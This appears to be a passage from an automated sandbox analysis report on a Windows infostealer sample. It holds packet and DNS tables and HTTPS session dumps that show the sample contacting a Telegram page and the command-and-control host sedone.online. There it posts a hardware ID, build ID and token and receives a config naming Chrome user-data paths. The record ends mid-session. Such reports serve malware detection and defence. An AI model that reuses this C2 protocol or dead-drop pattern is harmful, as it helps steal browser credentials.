                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.790642023 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.790950060 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.794487953 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799464941 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799559116 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799696922 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799709082 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799720049 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799737930 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799747944 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799760103 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799917936 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.800071955 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.800084114 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.800337076 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.802546024 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.809160948 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.809288025 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.809300900 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.809360027 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.809370995 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.809423923 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.811722040 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.817389965 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.161990881 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.166841984 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.166935921 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167000055 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167057037 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167072058 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167169094 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167181015 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167182922 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167193890 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167344093 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167356014 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.170000076 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.170548916 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.174055099 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175082922 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175123930 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175235987 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175277948 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175288916 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175335884 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175538063 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175673962 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175684929 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.178268909 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.184926033 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.184959888 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.184990883 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.185003042 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.185173988 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.186321974 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.188596010 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189026117 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189096928 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189189911 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189224005 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189280987 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189292908 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189399958 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189410925 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189428091 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189532995 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189567089 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189580917 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189646959 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.043490887 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.043531895 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.043870926 CET6330753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.044020891 CET5924653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.044184923 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.044229984 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.112613916 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.113291979 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.155347109 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.283457041 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.283529043 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.283588886 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.283626080 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.283912897 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.284148932 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.284199953 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.284388065 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.285028934 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.285550117 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.358418941 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.358527899 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.358764887 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.388185024 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.431185007 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.490216970 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.599199057 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.599267960 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.640167952 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.673445940 CET44362679162.159.61.3192.168.2.7
| Timestamp | Source IP | Dest IP | Checksum | Code | Type |
| --- | --- | --- | --- | --- | --- |
| Dec 16, 2024 15:40:06.018903017 CET | 192.168.2.7 | 1.1.1.1 | c24d | (Port unreachable) | Destination Unreachable |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Dec 16, 2024 15:39:28.827749968 CET | 192.168.2.7 | 1.1.1.1 | 0xe9d3 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:39:31.156423092 CET | 192.168.2.7 | 1.1.1.1 | 0xbfd0 | Standard query (0) | sedone.online | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:39:47.774465084 CET | 192.168.2.7 | 1.1.1.1 | 0xd87d | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:39:47.774736881 CET | 192.168.2.7 | 1.1.1.1 | 0xb08f | Standard query (0) | www.google.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:40:02.329718113 CET | 192.168.2.7 | 1.1.1.1 | 0xc692 | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:02.330032110 CET | 192.168.2.7 | 1.1.1.1 | 0xb77b | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:40:04.999963045 CET | 192.168.2.7 | 1.1.1.1 | 0x3e4d | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:05.000308037 CET | 192.168.2.7 | 1.1.1.1 | 0x62 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:40:05.772066116 CET | 192.168.2.7 | 1.1.1.1 | 0x6338 | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:05.772612095 CET | 192.168.2.7 | 1.1.1.1 | 0xc846 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.019522905 CET | 192.168.2.7 | 1.1.1.1 | 0xd9e1 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.022743940 CET | 192.168.2.7 | 1.1.1.1 | 0x1336 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.023587942 CET | 192.168.2.7 | 1.1.1.1 | 0x7b4d | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.023967981 CET | 192.168.2.7 | 1.1.1.1 | 0x2ac2 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.043452024 CET | 192.168.2.7 | 1.1.1.1 | 0x1365 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.043724060 CET | 192.168.2.7 | 1.1.1.1 | 0x8b00 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:40:10.530571938 CET | 192.168.2.7 | 1.1.1.1 | 0xef41 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:10.530932903 CET | 192.168.2.7 | 1.1.1.1 | 0x96de | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:40:10.531908035 CET | 192.168.2.7 | 1.1.1.1 | 0x1b73 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:10.532025099 CET | 192.168.2.7 | 1.1.1.1 | 0x8d0e | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:41:06.043870926 CET | 192.168.2.7 | 1.1.1.1 | 0xda68 | Standard query (0) | deff.nelreports.net | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:41:06.044020891 CET | 192.168.2.7 | 1.1.1.1 | 0xd50c | Standard query (0) | deff.nelreports.net | 65 | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Dec 16, 2024 15:39:28.965791941 CET | 1.1.1.1 | 192.168.2.7 | 0xe9d3 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:39:31.467752934 CET | 1.1.1.1 | 192.168.2.7 | 0xbfd0 | No error (0) | sedone.online | | 116.203.12.114 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:39:47.911634922 CET | 1.1.1.1 | 192.168.2.7 | 0xd87d | No error (0) | www.google.com | | 172.217.21.36 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:39:47.916599989 CET | 1.1.1.1 | 192.168.2.7 | 0xb08f | No error (0) | www.google.com | | | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:40:02.468054056 CET | 1.1.1.1 | 192.168.2.7 | 0xc692 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 16, 2024 15:40:02.469289064 CET | 1.1.1.1 | 192.168.2.7 | 0xb77b | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 16, 2024 15:40:03.196655989 CET | 1.1.1.1 | 192.168.2.7 | 0x40d7 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 16, 2024 15:40:03.216398954 CET | 1.1.1.1 | 192.168.2.7 | 0x7d96 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 16, 2024 15:40:03.216398954 CET | 1.1.1.1 | 192.168.2.7 | 0x7d96 | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | 94.245.104.56 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:05.138032913 CET | 1.1.1.1 | 192.168.2.7 | 0x62 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 16, 2024 15:40:05.138660908 CET | 1.1.1.1 | 192.168.2.7 | 0x3e4d | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 16, 2024 15:40:05.910219908 CET | 1.1.1.1 | 192.168.2.7 | 0x6338 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 16, 2024 15:40:05.910219908 CET | 1.1.1.1 | 192.168.2.7 | 0x6338 | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.181.65 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:06.018834114 CET | 1.1.1.1 | 192.168.2.7 | 0xc846 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.157438040 CET | 1.1.1.1 | 192.168.2.7 | 0xd9e1 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.157438040 CET | 1.1.1.1 | 192.168.2.7 | 0xd9e1 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.159883022 CET | 1.1.1.1 | 192.168.2.7 | 0x1336 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.161148071 CET | 1.1.1.1 | 192.168.2.7 | 0x2ac2 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.161192894 CET | 1.1.1.1 | 192.168.2.7 | 0x7b4d | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.161192894 CET | 1.1.1.1 | 192.168.2.7 | 0x7b4d | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.180618048 CET | 1.1.1.1 | 192.168.2.7 | 0x1365 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.180618048 CET | 1.1.1.1 | 192.168.2.7 | 0x1365 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:07.180651903 CET | 1.1.1.1 | 192.168.2.7 | 0x8b00 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false |
| Dec 16, 2024 15:40:10.246237993 CET | 1.1.1.1 | 192.168.2.7 | 0x1148 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 16, 2024 15:40:10.246237993 CET | 1.1.1.1 | 192.168.2.7 | 0x1148 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:10.668528080 CET | 1.1.1.1 | 192.168.2.7 | 0xef41 | No error (0) | sb.scorecardresearch.com | | 18.165.220.106 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:10.668528080 CET | 1.1.1.1 | 192.168.2.7 | 0xef41 | No error (0) | sb.scorecardresearch.com | | 18.165.220.57 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:10.668528080 CET | 1.1.1.1 | 192.168.2.7 | 0xef41 | No error (0) | sb.scorecardresearch.com | | 18.165.220.66 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:10.668528080 CET | 1.1.1.1 | 192.168.2.7 | 0xef41 | No error (0) | sb.scorecardresearch.com | | 18.165.220.110 | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 15:40:10.668975115 CET | 1.1.1.1 | 192.168.2.7 | 0x1b73 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 16, 2024 15:40:10.669203997 CET | 1.1.1.1 | 192.168.2.7 | 0x8d0e | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 16, 2024 15:41:06.182185888 CET | 1.1.1.1 | 192.168.2.7 | 0xd50c | No error (0) | deff.nelreports.net | deff.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 16, 2024 15:41:06.283886909 CET | 1.1.1.1 | 192.168.2.7 | 0xda68 | No error (0) | deff.nelreports.net | deff.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false |

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 149.154.167.99 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:30 UTC | 86 | OUT | GET /detct0r HTTP/1.1
                                                                                                                                                                                                                                                Host: t.me
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:39:31 UTC | 511 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:30 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                Content-Length: 12323
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: stel_ssid=672f5051597466d0c6_3497927683748389837; expires=Tue, 17 Dec 2024 14:39:30 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-control: no-store
                                                                                                                                                                                                                                                X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=35768000
2024-12-16 14:39:31 UTC | 12323 | IN |
                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49701 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:33 UTC | 233 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:39:34 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:33 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:39:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49703 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:35 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----MOPHDT0HDJMYUAIWTJE3
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 256
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:39:35 UTC | 256 | OUT | Data Ascii:
------MOPHDT0HDJMYUAIWTJE3
Content-Disposition: form-data; name="hwid"

7451CC6DBA5E1573532102-a33c7340-61ca
------MOPHDT0HDJMYUAIWTJE3
Content-Disposition: form-data; name="build_id"

e411cf62bcba04d74fc6b505b9235404
------MOPHDT0HDJMYUAIWTJE3--
2024-12-16 14:39:36 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:36 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:39:36 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
Data Ascii:
3a
1|1|1|1|2afa0bd343ad19f9200a181fa83489aa|1|1|1|0|0|50000|1
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49704 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:37 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AI58QQIWLXBIM7Y5P8Q9
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:39:37 UTC | 331 | OUT | Data Ascii:
------AI58QQIWLXBIM7Y5P8Q9
Content-Disposition: form-data; name="token"

2afa0bd343ad19f9200a181fa83489aa
------AI58QQIWLXBIM7Y5P8Q9
Content-Disposition: form-data; name="build_id"

e411cf62bcba04d74fc6b505b9235404
------AI58QQIWLXBIM7Y5P8Q9
Cont
2024-12-16 14:39:38 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:38 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:39:38 UTC | 2192 | IN |
                                                                                                                                                                                                                                                Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49711 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:40 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----U3WL6P8YMYM7QI589R9Z
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
